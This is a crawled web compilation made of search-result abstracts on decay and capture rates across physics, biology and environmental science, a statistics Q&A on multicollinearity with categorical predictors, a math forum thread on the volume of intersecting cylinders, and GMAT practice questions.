M.; Sobie, R. J.; Tasneem, N.; Gershon, T. J.; Harrison, P. F.; Latham, T. E.; Puccio, E. M. T.; Band, H. R.; Dasu, S.; Pan, Y.; Prepost, R.; Wu, S. L. 2012-08-24 In a sample of 471×10⁶ BB¯¯¯ events collected with the BABAR detector at the PEP-II e⁺e⁻ collider we study the rare decays B→K(*)l⁺l⁻, where l⁺l⁻ is either e⁺e⁻ or μ⁺μ⁻. We report results on partial branching fractions and isospin asymmetries in seven bins of dilepton mass-squared. We further present CP and lepton-flavor asymmetries for dilepton masses below and above the J/ψ resonance. We find no evidence for CP or lepton-flavor violation. The partial branching fractions and isospin asymmetries are consistent with the Standard Model predictions and with results from other experiments. 18. Enhancement of the lepton flavor violating Higgs boson decay rates from SUSY loops in the inverse seesaw model Arganda, E.; Herrero, M. J.; Marcano, X.; Weiland, C. 2016-03-01 In this article, we study the full one-loop SUSY contributions to the lepton flavor violating Higgs decay h →τ μ ¯, within the context of the supersymmetric inverse seesaw model. We assume that both the right-handed neutrino masses, MR, and their supersymmetric partner masses, mν˜R , are not far from the interesting O (TeV ) energy scale, and we work with scenarios with large neutrino Yukawa couplings that transmit large lepton flavor violating effects. By exploring the behavior with the most relevant parameters, mainly MR, mν ˜R and the trilinear sneutrino coupling Aν, we will look for regions of the parameter space where the enhancement of BR (h →τ μ ¯ ) is large enough to reach values at the percent level, which could explain the excess recently reported by CMS and ATLAS at the CERN Large Hadron Collider. EPA Pesticide Factsheets Radioactive decay is the emission of energy in the form of ionizing radiation. Example decay chains illustrate how radioactive atoms can go through many transformations as they become stable and no longer radioactive. 20. [ital K] dependence in the gamma decay of neutron resonances in [sup 168]Er and [sup 178]Hf SciTech Connect Rekstad, J.; Tveter, T.S.; Guttormsen, M.; Bergholt, L. ) 1993-06-01 The energy-corrected transition rates for [gamma] decay of the [ital n]-capture states in [sup 168]Er and [sup 178]Hf are calculated from data available in the literature. If one assumes that the capture states have good [ital K] values, the data reveal a significantly lower average transition rate when the normal [ital K]-selection rules are broken than for [ital K]-allowed transitions. The effect is more profound in the data from thermal neutron capture than in the data from 2 keV neutron capture. 1. Precision evaluation of the 71Ga(νe,e- ) solar neutrino capture rate from the (3He,t ) charge-exchange reaction Frekers, D.; Adachi, T.; Akimune, H.; Alanssari, M.; Brown, B. A.; Cleveland, B. T.; Ejiri, H.; Fujita, H.; Fujita, Y.; Fujiwara, M.; Gavrin, V. N.; Harakeh, M. N.; Hatanaka, K.; Holl, M.; Iwamoto, C.; Lennarz, A.; Okamoto, A.; Okamura, H.; Suzuki, T.; Tamii, A. 2015-03-01 A precision measurement of the 71Ga(3He,t ) 71Ge charge-exchange reaction was performed. By using a rather complete set of theoretical form factors to describe the cross-section angular distributions over a large angular range, the Gamow-Teller strength distribution up to the effective neutron-separation energy in 71Ge was extracted. The data and the analysis constrain the 71Ga(νe,e- ) solar neutrino rate in a neutrino nonoscillation scenario. For nonoscillating neutrinos we report a solar neutrino capture rate of 122.4 ±3.4 (stat ) ±1.1 (sys ) SNU, which is lower than the presently accepted value of 132 ±18 SNU, though not in disagreement given the quoted errors. 2. Tooth Decay MedlinePlus You call it a cavity. Your dentist calls it tooth decay or dental caries. They're all names for a hole in your tooth. The cause of tooth decay is plaque, a sticky substance in your mouth made up mostly of germs. Tooth decay starts in the outer layer, called the enamel. Without ... 3. Trunk decays Treesearch Alex L. Shigo 1989-01-01 Trunk decays are major causes of low quality wood-wood with little or no economic value. As a forest practitioner you should be able to recognize trees at high risk for decay and remove them if timber production is your primary objective. Remember, however, that decayed trees often develop into den trees or nesting sites and provide essential habitat for wildlife.... 4. mRNA decay rates in late-developing Dictyostelium discoideum cells are heterogeneous, and cyclic AMP does not act directly to stabilize cell-type-specific mRNAs. PubMed Central Manrow, R E; Jacobson, A 1988-01-01 We reevaluated the use of 32PO4 pulse-chases for analyzing mRNA decay rates in late-developing Dictyostelium cells. We found that completely effective PO4 chases could not be obtained in developing cells and that, as a consequence, the decay rates exhibited by some mRNAs were influenced by the rates at which they were transcribed. In developing cells disaggregated in the presence of cyclic AMP, the poly(A)+ mRNA population turned over with an apparent half-life of 4 h, individual mRNA decay rates were heterogeneous, and some prestalk and prespore mRNAs appeared to decay with biphasic kinetics. In cells disaggregated in the absence of cyclic AMP, all prestalk and prespore mRNAs decayed with biphasic kinetics. During the first 1 to 1.5 h after disaggregation in the absence of cyclic AMP, the cell-type-specific mRNAs were selectively degraded, decaying with half-lives of 20 to 30 min; thereafter, the residual prestalk and prespore mRNA molecules decayed at rates that were similar to those measured in the presence of cyclic AMP. This short-term labilization of cell-type-specific mRNAs was observed even for those species not requiring cyclic AMP for their accumulation in developing cells. The observation that cell-type specific mRNAs can decay at similar rates in disaggregated cells with or without cyclic AMP indicates that this compound does not act directly to stabilize prestalk and prespore mRNAs during development and that its primary role in the maintenance of cyclic-AMP-dependent mRNAs is likely to be transcriptional. Images PMID:2847029 5. Investigation and modeling of biomass decay rate in the dark and its potential influence on net productivity of solar photobioreactors for microalga Chlamydomonas reinhardtii and cyanobacterium Arthrospira platensis. PubMed Le Borgne, François; Pruvost, Jérémy 2013-06-01 Biomass decay rate (BDR) in the dark was investigated for Chlamydomonas reinhardtii (microalga) and Arthrospira platensis (cyanobacterium). A specific setup based on a torus photobioreactor with online gas analysis was validated, enabling us to follow the time course of the specific BDR using oxygen monitoring and mass balance. Various operating parameters that could limit respiration rates, such as culture temperature and oxygen deprivation, were then investigated. C. reinhardtii was found to present a higher BDR in the dark than A. platensis, illustrating here the difference between eukaryotic and prokaryotic cells. In both cases, temperature proved an influential parameter, and the Arrhenius law was found to efficiently relate specific BDR to culture temperature. The utility of decreasing temperature at night to increase biomass productivity in a solar photobioreactor is also illustrated. 6. Theory of weak hypernuclear decay SciTech Connect Dubach, J.F.; Feldman, G.B.; Holstein, B.R. |; de la Torre, L. 1996-07-01 The weak nomesonic decay of {Lambda}-hypernuclei is studied in the context of a one-meson-exchange model. Predictions are made for the decay rate, the {ital p}/{ital n} stimulation ratio and the asymmetry in polarized hypernuclear decay. Copyright {copyright} 1996 Academic Press, Inc. 7. Improving dengue virus capture rates in humans and vectors in Kamphaeng Phet Province, Thailand, using an enhanced spatiotemporal surveillance strategy. PubMed Thomas, Stephen J; Aldstadt, Jared; Jarman, Richard G; Buddhari, Darunee; Yoon, In-Kyu; Richardson, Jason H; Ponlawat, Alongkot; Iamsirithaworn, Sopon; Scott, Thomas W; Rothman, Alan L; Gibbons, Robert V; Lambrechts, Louis; Endy, Timothy P 2015-07-01 Dengue is of public health importance in tropical and sub-tropical regions. Dengue virus (DENV) transmission dynamics was studied in Kamphaeng Phet Province, Thailand, using an enhanced spatiotemporal surveillance of 93 hospitalized subjects with confirmed dengue (initiates) and associated cluster individuals (associates) with entomologic sampling. A total of 438 associates were enrolled from 208 houses with household members with a history of fever, located within a 200-m radius of an initiate case. Of 409 associates, 86 (21%) had laboratory-confirmed DENV infection. A total of 63 (1.8%) of the 3,565 mosquitoes collected were dengue polymerase chain reaction positive (PCR+). There was a significant relationship between spatial proximity to the initiate case and likelihood of detecting DENV from associate cases and Aedes mosquitoes. The viral detection rate from human hosts and mosquito vectors in this study was higher than previously observed by the study team in the same geographic area using different methodologies. We propose that the sampling strategy used in this study could support surveillance of DENV transmission and vector interactions. © The American Society of Tropical Medicine and Hygiene. 8. Improving Dengue Virus Capture Rates in Humans and Vectors in Kamphaeng Phet Province, Thailand, Using an Enhanced Spatiotemporal Surveillance Strategy PubMed Central Thomas, Stephen J.; Aldstadt, Jared; Jarman, Richard G.; Buddhari, Darunee; Yoon, In-Kyu; Richardson, Jason H.; Ponlawat, Alongkot; Iamsirithaworn, Sopon; Scott, Thomas W.; Rothman, Alan L.; Gibbons, Robert V.; Lambrechts, Louis; Endy, Timothy P. 2015-01-01 Dengue is of public health importance in tropical and sub-tropical regions. Dengue virus (DENV) transmission dynamics was studied in Kamphaeng Phet Province, Thailand, using an enhanced spatiotemporal surveillance of 93 hospitalized subjects with confirmed dengue (initiates) and associated cluster individuals (associates) with entomologic sampling. A total of 438 associates were enrolled from 208 houses with household members with a history of fever, located within a 200-m radius of an initiate case. Of 409 associates, 86 (21%) had laboratory-confirmed DENV infection. A total of 63 (1.8%) of the 3,565 mosquitoes collected were dengue polymerase chain reaction positive (PCR+). There was a significant relationship between spatial proximity to the initiate case and likelihood of detecting DENV from associate cases and Aedes mosquitoes. The viral detection rate from human hosts and mosquito vectors in this study was higher than previously observed by the study team in the same geographic area using different methodologies. We propose that the sampling strategy used in this study could support surveillance of DENV transmission and vector interactions. PMID:25986580 9. On collisional capture rates of irregular satellites around the gas-giant planets and the minimum mass of the solar nebula Koch, F. Elliott; Hansen, Bradley M. S. 2011-09-01 We investigate the probability that an inelastic collision of planetesimals within the Hill sphere of the Jovian planets could explain the presence and orbits of observed irregular satellites. Capture of satellites via this mechanism is highly dependent on not only the mass of the protoplanetary disc, but also the shape of the planetesimal size distribution. We performed 2000 simulations for integrated time intervals ˜2 Myr and found that, given the currently accepted value for the minimum mass solar nebula and planetesimal number density based upon the Nesvorný et al. and Charnoz & Morbidelli size distribution dN˜D-3.5dD, the collision rates for the different Jovian planets range between ˜0.6 and ≳170 Myr-1 for objects with radii 1 km ≤r≤ 10 km. Additionally, we found that the probability that these collisions remove enough orbital energy to yield a bound orbit was ≲10-5 and had very little dependence on the relative size of the planetesimals. Of these collisions, the collision energy between two objects was ≳103 times the gravitational binding energy for objects with radii ˜100 km. We find that capturing irregular satellites via collisions between unbound objects can only account for ˜0.1 per cent of the observed population, hence this cannot be the sole method of producing irregular satellites. 10. Hypernuclear Weak Decays Itonaga, K.; Motoba, T. The recent theoretical studies of Lambda-hypernuclear weak decaysof the nonmesonic and pi-mesonic ones are developed with the aim to disclose the link between the experimental decay observables and the underlying basic weak decay interactions and the weak decay mechanisms. The expressions of the nonmesonic decay rates Gamma_{nm} and the decay asymmetry parameter alpha_1 of protons from the polarized hypernuclei are presented in the shell model framework. We then introduce the meson theoretical Lambda N -> NN interactions which include the one-meson exchanges, the correlated-2pi exchanges, and the chiral-pair-meson exchanges. The features of meson exchange potentials and their roles on the nonmesonic decays are discussed. With the adoption of the pi + 2pi/rho + 2pi/sigma + omega + K + rhopi/a_1 + sigmapi/a_1 exchange potentials, we have carried out the systematic calculations of the nonmesonic decay observables for light-to-heavy hypernuclei. The present model can account for the available experimental data of the decay rates, Gamma_n/Gamma_p ratios, and the intrinsic asymmetry parameters alpha_Lambda (alpha_Lambda is related to alpha_1) of emitted protons well and consistently within the error bars. The hypernuclear lifetimes are evaluated by converting the total weak decay rates Gamma_{tot} = Gamma_pi + Gamma_{nm} to tau, which exhibit saturation property for the hypernuclear mass A ≥ 30 and agree grossly well with experimental data for the mass range from light to heavy hypernuclei except for the very light ones. Future extensions of the model and the remaining problems are also mentioned. The pi-mesonic weak processes are briefly surveyed, and the calculations and predictions are compared and confirmed by the recent high precision FINUDA pi-mesonic decay data. This shows that the theoretical basis seems to be firmly grounded. 11. Isovolumic pressure-to-early rapid filling decay rate relation: model-based derivation and validation via simultaneous catheterization echocardiography. PubMed Chung, Charles S; Ajo, David M; Kovács, Sándor J 2006-02-01 Transmitral Doppler echocardiography is the preferred method of noninvasive diastolic function assessment. Correlations between catheterization-based measures of isovolumic relaxation (IVR) and transmitral, early rapid filling (Doppler E-wave)-derived parameters have been observed, but no model-based, causal explanation has been offered. IVR has also been characterized in terms of its duration as IVR time (IVRT) and by tau, the time-constant of IVR, by approximating the terminal left ventricular IVR pressure contour as Pt= Pinfinity + P(o)e(-t/tau), where Pt is the continuity of pressure, Pinfinity and Po are constants, t is time, and tau is the time constant of IVR. To characterize the relation between IVR and early rapid filling more fully, simultaneous (micromanometric) left ventricular pressure and transmitral Doppler E-wave data from 25 subjects undergoing elective cardiac catheterization and having normal physiology were analyzed. The time constant tau was determined from the dP/dt vs. P (phase) plane and, simultaneous Doppler E-waves provided global indexes of chamber viscosity/relaxation (c), chamber stiffness (k), and load (xo). We hypothesize that temporal continuity of pressure decay at mitral valve opening and physiological constraints permit the algebraic derivation of linear relations relating 1/tau to both peak atrioventricular pressure gradient (kxo) and E-wave-derived viscosity/relaxation (c) but does not support a similar, causal (linear) relation between deceleration time and tau or IVRT. Both predicted linear relations were observed: kxo to 1/tau (r = 0.71) and viscosity/relaxation to 1/tau (r = 0.71). Similarly, as anticipated, only a weak linear correlation between deceleration time and IVRT or tau was observed (r = 0.41). The observed in vivo relationship provides insight into the isovolumic mechanism of relaxation and the changing-volume mechanism of early rapid filling via a link of the respective relaxation properties. 12. Photonuclear and radiative-capture reaction rates for nuclear astrophysics and transmutation: 92-100Mo, 88Sr, 90Zr, and 139La Beard, M.; Frauendorf, S.; Kämpfer, B.; Schwengner, R.; Wiescher, M. 2012-06-01 Experimental photoabsorption cross sections for the nuclei 92,94,96,98,100Mo, 88Sr, 90Zr, and 139La are used as an input for calculations of (γ,n), (γ,p), and (γ,α), as well as (n,γ), (p,γ), and (α,γ) cross sections and reaction rates at energies and temperatures relevant for nucleosynthesis network models and transmutation projects. The calculations are performed with the statistical-model code talys. The results are compared with those obtained by using different analytic standard parametrizations of γ-ray strength functions implemented in talys and with an energy-damped double-Lorentzian model. The radiative capture reaction cross sections are enhanced by the pygmy resonances in 88Sr, 90Zr, and 139La. 13. Modification of the 3H-leucine Incorporation Technique for Quantifying Rates of Bacterial Secondary Production on Decaying Wetland Plant Litter: Effectiveness of Microdialysis. Gillies, J. E.; Francoeur, S. N.; Kuehn, K. A. 2005-05-01 The radiolabelled 3H-leucine incorporation technique for quantifying rates of bacterial production has increased in popularity since its original description for bacterioplankton communities. Prior studies addressing incorporation conditions (e.g., substrate saturation) for bacterial communities in other habitats, such as decaying plant litter, have reported a wide range of final leucine concentrations (400nM to 50,000nM) to achieve saturation-level uptake. We assessed the application of the 3H-leucine incorporation procedure for measuring bacterial production on decaying wetland plant litter. Substrate saturation experiments (9 concentrations, 10nM to 50,000nM final leucine) were conducted for bacterial communities colonizing submerged litter of three emergent plant species (Typha angustifolia, Schoenoplectus validus, and Phragmites australis). A modified 3H-leucine protocol was developed by coupling previously described incubation and extraction protocols with microdialysis (500MWCO) of the final radiolabelled protein extract. Incorporation of 3H-leucine into protein exhibited a biphasic saturation curve, with lower Km values ranging from 400nM to 1200nM depending on the plant species studied. Upper Km values ranged from 4000nM to 6000nM. Dialysis of the crude protein extract significantly improved counting precision and the signal-to-noise ratio. These results suggest differential uptake by litter associated microbial assemblages, with lower Km values possibly representing bacterial uptake and higher Km values representing non-bacterial uptake. 14. Determination of rate constants and branching ratios for TCE degradation by zero-valent iron using a chain decay multispecies model Hwang, Hyoun-Tae; Jeen, Sung-Wook; Sudicky, Edward A.; Illman, Walter A. 2015-06-01 The applicability of a newly-developed chain-decay multispecies model (CMM) was validated by obtaining kinetic rate constants and branching ratios along the reaction pathways of trichloroethene (TCE) reduction by zero-valent iron (ZVI) from column experiments. Changes in rate constants and branching ratios for individual reactions for degradation products over time for two columns under different geochemical conditions were examined to provide ranges of those parameters expected over the long-term. As compared to the column receiving deionized water, the column receiving dissolved CaCO3 showed higher mean degradation rates for TCE and all of its degradation products. However, the column experienced faster reactivity loss toward TCE degradation due to precipitation of secondary carbonate minerals, as indicated by a higher value for the ratio of maximum to minimum TCE degradation rate observed over time. From the calculated branching ratios, it was found that TCE and cis-dichloroethene (cis-DCE) were dominantly dechlorinated to chloroacetylene and acetylene, respectively, through reductive elimination for both columns. The CMM model, validated by the column test data in this study, provides a convenient tool to determine simultaneously the critical design parameters for permeable reactive barriers and natural attenuation such as rate constants and branching ratios. 15. Determination of rate constants and branching ratios for TCE degradation by zero-valent iron using a chain decay multispecies model. PubMed Hwang, Hyoun-Tae; Jeen, Sung-Wook; Sudicky, Edward A; Illman, Walter A 2015-01-01 The applicability of a newly-developed chain-decay multispecies model (CMM) was validated by obtaining kinetic rate constants and branching ratios along the reaction pathways of trichloroethene (TCE) reduction by zero-valent iron (ZVI) from column experiments. Changes in rate constants and branching ratios for individual reactions for degradation products over time for two columns under different geochemical conditions were examined to provide ranges of those parameters expected over the long-term. As compared to the column receiving deionized water, the column receiving dissolved CaCO3 showed higher mean degradation rates for TCE and all of its degradation products. However, the column experienced faster reactivity loss toward TCE degradation due to precipitation of secondary carbonate minerals, as indicated by a higher value for the ratio of maximum to minimum TCE degradation rate observed over time. From the calculated branching ratios, it was found that TCE and cis-dichloroethene (cis-DCE) were dominantly dechlorinated to chloroacetylene and acetylene, respectively, through reductive elimination for both columns. The CMM model, validated by the column test data in this study, provides a convenient tool to determine simultaneously the critical design parameters for permeable reactive barriers and natural attenuation such as rate constants and branching ratios. 16. Measurement of muon capture on the proton to 1% precision and determination of the pseudoscalar coupling gP. PubMed Andreev, V A; Banks, T I; Carey, R M; Case, T A; Clayton, S M; Crowe, K M; Deutsch, J; Egger, J; Freedman, S J; Ganzha, V A; Gorringe, T; Gray, F E; Hertzog, D W; Hildebrandt, M; Kammel, P; Kiburg, B; Knaack, S; Kravtsov, P A; Krivshich, A G; Lauss, B; Lynch, K R; Maev, E M; Maev, O E; Mulhauser, F; Petitjean, C; Petrov, G E; Prieels, R; Schapkin, G N; Semenchuk, G G; Soroka, M A; Tishchenko, V; Vasilyev, A A; Vorobyov, A A; Vznuzdaev, M E; Winter, P 2013-01-04 The MuCap experiment at the Paul Scherrer Institute has measured the rate Λ(S) of muon capture from the singlet state of the muonic hydrogen atom to a precision of 1%. A muon beam was stopped in a time projection chamber filled with 10-bar, ultrapure hydrogen gas. Cylindrical wire chambers and a segmented scintillator barrel detected electrons from muon decay. Λ(S) is determined from the difference between the μ(-) disappearance rate in hydrogen and the free muon decay rate. The result is based on the analysis of 1.2 × 10(10) μ(-) decays, from which we extract the capture rate Λ(S) = (714.9 ± 5.4(stat) ± 5.1(syst)) s(-1) and derive the proton's pseudoscalar coupling g(P)(q(0)(2) = -0.88 m(μ)(2)) = 8.06 ± 0.55. PubMed Groch, M W 1998-01-01 18. EFFECT OF VENTILATION SYSTEMS AND AIR FILTERS ON DECAY RATES OF PARTICLES PRODUCED BY INDOOR SOURCES IN AN OCCUPIED TOWNHOUSE EPA Science Inventory Several studies have shown the importance of particle losses in real homes due to deposition and filtration; however, none have quantitatively shown the impact of using a central forced air fan and in-duct filter on particle loss rates. In an attempt to provide such data, we me... 19. EFFECT OF VENTILATION SYSTEMS AND AIR FILTERS ON DECAY RATES OF PARTICLES PRODUCED BY INDOOR SOURCES IN AN OCCUPIED TOWNHOUSE EPA Science Inventory Several studies have shown the importance of particle losses in real homes due to deposition and filtration; however, none have quantitatively shown the impact of using a central forced air fan and in-duct filter on particle loss rates. In an attempt to provide such data, we me... 20. Effect of ventilation systems and air filters on decay rates of particles produced by indoor sources in an occupied townhouse Howard-Reed, Cynthia; Wallace, Lance A.; Emmerich, Steven J. Several studies have shown the importance of particle losses in real homes due to deposition and filtration; however, none have quantitatively shown the impact of using a central forced air fan and in-duct filter on particle loss rates. In an attempt to provide such data, we measured the deposition of particles ranging from 0.3 to 10 μm in an occupied townhouse and also in an unoccupied test house. Experiments were run with three different sources (cooking with a gas stove, citronella candle, pouring kitty litter), with the central heating and air conditioning (HAC) fan on or off, and with two different types of in-duct filters (electrostatic precipitator and ordinary furnace filter). Particle size, HAC fan operation, and the electrostatic precipitator had significant effects on particle loss rates. The standard furnace filter had no effect. Surprisingly, the type of source (combustion vs. mechanical generation) and the type of furnishings (fully furnished including carpet vs. largely unfurnished including mostly bare floor) also had no measurable effect on the deposition rates of particles of comparable size. With the HAC fan off, average deposition rates varied from 0.3 h -1 for the smallest particle range (0.3-0.5 μm) to 5.2 h -1 for particles greater than 10 μm. Operation of the central HAC fan approximately doubled these rates for particles <5 μm, and increased rates by 2 h -1 for the larger particles. An in-duct electrostatic precipitator increased the loss rates compared to the fan-off condition by factors of 5-10 for particles <2.5 μm, and by a factor of 3 for 2.5-5.0 μm particles. In practical terms, use of the central fan alone could reduce indoor particle concentrations by 25-50%, and use of an in-duct ESP could reduce particle concentrations by 55-85% compared to fan-off conditions. 1. Radiative decay rate of a quantum well exciton in a semiconductor microcavity: Cross-over behavior of exciton- and cavity-modes Odani, Kensuke; Ohfuti, Yasushi; Cho, Kikuo 1993-08-01 A cross-over behavior was found between microcavity (MC) mode and quantum well (QW)-exciton mode as a function of parallel wave vector k for a QW in a MC, i.e., a 2D structure consisting of two sets of distributed Bragg reflectors (DBR) with a QW at the center of them. The radiative widths of the two modes were calculated as functions of k, the layer number of DBR, and the non-radiative width of the QW-exciton. The radiative decay rate of the QW-exciton mode shows a remarkable enhancement at a critical value of k, which is determined by the relative frequencies of the "empty" MC and "bare" QW-exciton modes. The cross-over behavior is the result of the excessive mixing of the two modes. 2. Rapid heating tensile tests of high-energy-rate-forged 316L stainless steel containing internal helium from radioactive decay of absorbed tritium SciTech Connect Mosley, W.C. 1990-12-31 316L stainless steel is a candidate material for construction of equipment that will be exposed to tritium. This austenitic stainless steel is frequently used in the high-energy-rate-forged (HERF) metallurgical condition to take advantage of increased strength produced by cold work introduced by this process. Proper design of tritium-handling equipment will require an understanding of how helium-3, the product of radioactive decay of tritium, affects mechanical properties. This report describes results of elevated-temperature tensile testing of HERF 316L stainless steel specimens containing helium concentrations of 171 (calculated) atomic parts per million (appm). Results are compared with those reported previously for specimens containing 0 and 94 (measured) appm helium. 3. Rapid heating tensile tests of high-energy-rate-forged 316L stainless steel containing internal helium from radioactive decay of absorbed tritium SciTech Connect Mosley, W.C. 1990-01-01 316L stainless steel is a candidate material for construction of equipment that will be exposed to tritium. This austenitic stainless steel is frequently used in the high-energy-rate-forged (HERF) metallurgical condition to take advantage of increased strength produced by cold work introduced by this process. Proper design of tritium-handling equipment will
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8968431949615479, "perplexity": 6322.303860584943}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934806832.87/warc/CC-MAIN-20171123123458-20171123143458-00400.warc.gz"}
http://stats.stackexchange.com/questions/35233/how-to-test-for-and-remedy-multicollinearity-in-optimal-scaling-ordinal-regressi
# How to test for and remedy multicollinearity in optimal scaling/ordinal regression with categorical IVs I have a data set containing only categorical variables (both nominal and ordinal in nature). The dependent variable is also ordinal (with 4 categories). I was planning to run a categorical regression with optimal scaling instead of ordinal logistic regression aiming at obtaining a single beta coefficient for each independent variable (and also to account for the non-linearity of course). Because an overall comment is desired on whether the dependent variable is affected by a particular independent variable or not. Now, to me, by theory a few of the variables seem to be related with each other. So, I am interested to check if multicollinearity exists and want to remove it to facilitate the regression. But I don't want to drop any variable because I have quite a few. The polychoric correlation matrix shows the highest pairwise correlation to be 0.69. Except from this and the other one, all others pairwise correlations are quite small. As the variables are not continuous in my case, so how do I test the presence of multicollinearity in categorical regression and what is the remedy? How do I remove the effect of multicollinearity? I guess standardization will not help as these variables are categorical. - I changed your title quite a bit, I hope it clarifies rather than obscures your intent. –  Peter Flom Aug 28 '12 at 11:03 It's okay sir, certainly the title is now more generalized and I think whatever the regression type is (using CATREG or Ordinal logistic regression) the test and remedy of multicollinearity should be the same. Am I right sir? –  Blain Waan Aug 28 '12 at 19:05 If you are using R, SPSS or Stata, you can look at the perturb package. It diagnoses collinearity by adding random noise to continuous variables; for categorical variables, some are changed to different categories. In the documentation for perturb in R, it notes that the model need not be lm, implying that any model (including ones built with optimal scaling or ordinal logistic) could be used. -
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7368321418762207, "perplexity": 1180.5237064747528}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-10/segments/1393999678302/warc/CC-MAIN-20140305060758-00089-ip-10-183-142-35.ec2.internal.warc.gz"}
http://mymathforum.com/calculus/342181-calculating-volume-three-intersecting-cylinders.html
My Math Forum calculating volume of three intersecting cylinders Calculus Calculus Math Forum October 8th, 2017, 01:27 PM #1 Senior Member   Joined: Jan 2017 From: Toronto Posts: 190 Thanks: 2 calculating volume of three intersecting cylinders Three cylinders of radius 1 intersect at right angles at the origin. Find the volume contained inside all three cylinders. Would anyone show me how to use double integral to solve this problem first with the Cartesian coordinate and then with polar coordinate? Answer: $\displaystyle 16 - 8 \sqrt{2}$ October 8th, 2017, 03:34 PM #2 Senior Member     Joined: Sep 2015 From: USA Posts: 2,098 Thanks: 1093 i vaguely remember doing this by taking 8 times the volume of the solid within the first octant. All 8 octants are identical. That volume would seem to then be $2-\sqrt{2}$ see if you can work it that way. Thread Tools Display Modes Linear Mode Similar Threads Thread Thread Starter Forum Replies Last Post zollen Calculus 0 April 14th, 2017 03:54 PM John Travolski Calculus 1 April 9th, 2017 12:29 PM Mearntain Calculus 3 March 15th, 2016 05:03 AM SoulRyder Computer Science 2 May 4th, 2014 11:37 AM etidhor Algebra 9 December 1st, 2012 08:44 AM Contact - Home - Forums - Cryptocurrency Forum - Top
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5325036644935608, "perplexity": 2602.952893406332}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267159193.49/warc/CC-MAIN-20180923095108-20180923115508-00365.warc.gz"}
https://www.beatthegmat.com/search.php?author_id=391525&sr=posts&sid=f74cd4086c5a86dd2a1acd219665591a
## Search found 1395 matches #### A certain movie star's salary for each film she makes consists of a fixed amount, along with a percentage of the gross ##### A certain movie star's salary for each film she makes consists of a fixed amount, along with a percentage of the gross A certain movie star's salary for each film she makes consists of a fixed amount, along with a percentage of the gross revenue the film generates. In her last two roles, the star made $$\32$$ million on a film that grossed $$\100$$ million, and $$\24$$ million on a film that grossed $$\60$$ mill... #### What is the ratio of $$x:y:z?$$ ##### What is the ratio of $$x:y:z?$$ What is the ratio of $$x:y:z?$$ (1) $$xy = 14$$ (2) $$yz = 21$$ Source: Official Guide by Gmat_mission Sun Sep 19, 2021 1:07 pm Forum: Data Sufficiency Topic: What is the ratio of $$x:y:z?$$ Replies: 0 Views: 12 #### There are 8 teams in a certain league and each team plays each of the other teams exactly once. If each game is played ##### There are 8 teams in a certain league and each team plays each of the other teams exactly once. If each game is played There are 8 teams in a certain league and each team plays each of the other teams exactly once. If each game is played by 2 teams, what is the total number of games played? A. 15 B. 16 C. 28 D. 56 E. 64 Source: Official Guide #### Given $$A$$ and $$B$$ are non-negative, is $$A^5>B^2?$$ ##### Given $$A$$ and $$B$$ are non-negative, is $$A^5>B^2?$$ Given $$A$$ and $$B$$ are non-negative, is $$A^5>B^2?$$ (1) $$A^{\dfrac13}>B^2$$ (2) $$A>B^2$$ Source: GMAT Paper Tests by Gmat_mission Sun Sep 19, 2021 1:04 pm Forum: Data Sufficiency Topic: Given $$A$$ and $$B$$ are non-negative, is $$A^5>B^2?$$ Replies: 0 Views: 12 #### 10 business executives and 7 chairmen meet at a conference. If each business executive shakes the hand of every other ##### 10 business executives and 7 chairmen meet at a conference. If each business executive shakes the hand of every other 10 business executives and 7 chairmen meet at a conference. If each business executive shakes the hand of every other business executive and every chairman once, and each chairman shakes the hand of each of the business executives but not the other chairmen, how many handshakes would take place? A. ... #### What is the average (arithmetic mean) of eleven consecutive integers? ##### What is the average (arithmetic mean) of eleven consecutive integers? What is the average (arithmetic mean) of eleven consecutive integers? (1) The average of the first nine integers is $$7.$$ (2) The average of the last nine integers is $$9.$$ Source: GMAT Prep by Gmat_mission 